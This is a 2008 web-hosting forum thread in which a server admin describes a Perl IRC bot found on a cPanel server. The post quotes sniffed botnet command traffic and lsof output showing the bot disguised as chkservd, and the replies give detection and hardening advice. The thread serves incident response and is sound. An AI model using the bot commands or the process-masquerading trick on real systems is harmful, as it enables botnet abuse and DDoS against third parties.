The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

From odd 'nobody' process to unusual and malicious IRC traffic

Discussion in 'General Discussion' started by jasonb3t, May 29, 2008.

  1. jasonb3t

    jasonb3t Member

    May 29, 2008
    Likes Received:
    Trophy Points:
    We discovered an odd process on our CPanel server, launched from /usr/sbin/sshd, but running under the name "perl" as the user "nobody." It was taking up a lot of CPU time.

    Doing an "lsof | grep <PID number>," I found it would periodically open lots of Apache logs, attempt to start listeners on ports 80 and 443, and launch an IRC connection out to

    I started up a packet sniffer to see what the IRC traffic was about and I got this conversation (abc! is evidently our box responding to queries as an IRC bot):
    :AnGeL! PRIVMSG #udp :!ssh 22
    :AnGeL! PRIVMSG #udp :!ssh 80
    :_secure! PRIVMSG #udp :!dns
    :abc! PRIVMSG #udp :.4Unable to resolve .. .
    :abc! PRIVMSG #udp :Conexiunea la (22) e in TIME OUT.
    :abc! PRIVMSG #udp :Conexiunea la (80) e in TIME OUT.
    :_secure! PRIVMSG #udp :.ACTION of.
    :_secure! PRIVMSG #udp :.ACTION @ somn.
    :AnGeL! PRIVMSG #udp :!ssh 53
    :abc! PRIVMSG #udp :Conexiunea la (53) este acceptata!
    After seeing that traffic, we had enough and did a "kill -9" to get rid of the process.

    Now we're seeing a process that supposedly part of CPanel trying to connect to a myriad of IRC servers:
    # lsof -i | grep ircd
    chkservd   2327   nobody    0u  IPv4 935805051       TCP> (SYN_SENT)
    chkservd   2327   nobody    1u  IPv4 877984138       TCP ***ourIP***:47008-> (ESTABLISHED)
    chkservd   2327   nobody    2u  IPv4 877708484       TCP ***ourIP***:44069-> (ESTABLISHED)
    chkservd   2327   nobody  396u  IPv4 877852377       TCP ***ourIP***:45815-> (ESTABLISHED)
    chkservd   2327   nobody  398u  IPv4 877704785       TCP ***ourIP***:43997-> (ESTABLISHED)
    chkservd   2327   nobody  399u  IPv4 877719170       TCP ***another_of_ourIPs***:44211-> (ESTABLISHED)
    chkservd   2327   nobody  400u  IPv4 877714142       TCP ***ourIP***:44119-> (ESTABLISHED)
    chkservd   2327   nobody  401u  IPv4 877730070       TCP ***yet another_of_ourIPs***:44289-> (ESTABLISHED)
    There are several IP addresses configured on the server and these connection attempts are actually being made from different ones--not just the default.

    I've run rootkit finders and some clamscans and I've come up with nothing. chkservd is not configured for any IRC services. Any ideas, gentlemen?
  2. ramprage

    ramprage Well-Known Member

    Jul 21, 2002
    Likes Received:
    Trophy Points:
    This looks like a perl IRC bot which usually gets uploaded to a users web space and run remotely. Virus scanners won't pick that type of thing up since it's not a virus. Upload Guardian will.

    Also having Nobody Check installed is a good idea to keep an eye on your nobody/web user processes.
  3. IPSecureNetwork

    IPSecureNetwork Well-Known Member

    May 28, 2005
    Likes Received:
    Trophy Points:
    buddy you are another victim of the Shell Bots kiddies..
    this maybe happend because one of your customers have a vulnerable site with a remote file inclusion bug.

    one good idea is activate mod_security or snort inline to prevent this intrussions ..

    if you are infected with this perl bots your box will be available to be used like a gun against any target shotting a lot of Gbps to someone.

    the use of a very good ids constantly updated is one of the best practice i think to prevent this kind of troubles.

    Best Regards

Share This Page